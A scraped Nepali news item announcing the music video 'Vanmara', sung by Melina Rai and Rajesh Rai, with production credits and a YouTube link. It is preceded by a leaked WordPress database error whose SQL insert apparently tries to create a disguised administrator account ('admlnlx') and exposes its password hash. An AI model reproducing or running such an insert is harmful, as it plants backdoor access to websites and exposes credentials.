WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bpft84jAygRQgJ2ASlo5c9CN7QNr2M1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:45:47', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । मेलिना राई र राजेश राईको स्वर रहेको ‘वनमारा’ गीतको भिडियो सार्वजनिक भएको छ ।
शनिबार ओएस आर युटुब च्यालन बाट बनमारा सार्वजिक गरिएको हो ।
निर्देश तथा गीतकार दुर्लभ जन्तरेको शब्द, शङ्कर थापा स्माइलको सङ्गीत, उदय राज पौडेलको संगीत संयोजन तथा अशोक मर्हजनको मिक्सिङ तथा मास्टरिङ रहेको छ ।
भिडियोमा हाँस्यकलाकार सुलेमान शङ्कर इकु, भिमफेदी गाइज र स्मारिका ढकालको फिचरिङ रहेको छ ।
भिडियोको छायाङ्कन र सम्पादन पवन सुसलिङले गरेका हुन् भने निर्मल कुमार लामाले निर्देशन रहेको छ ।https://youtu.be/o15WHn72jJw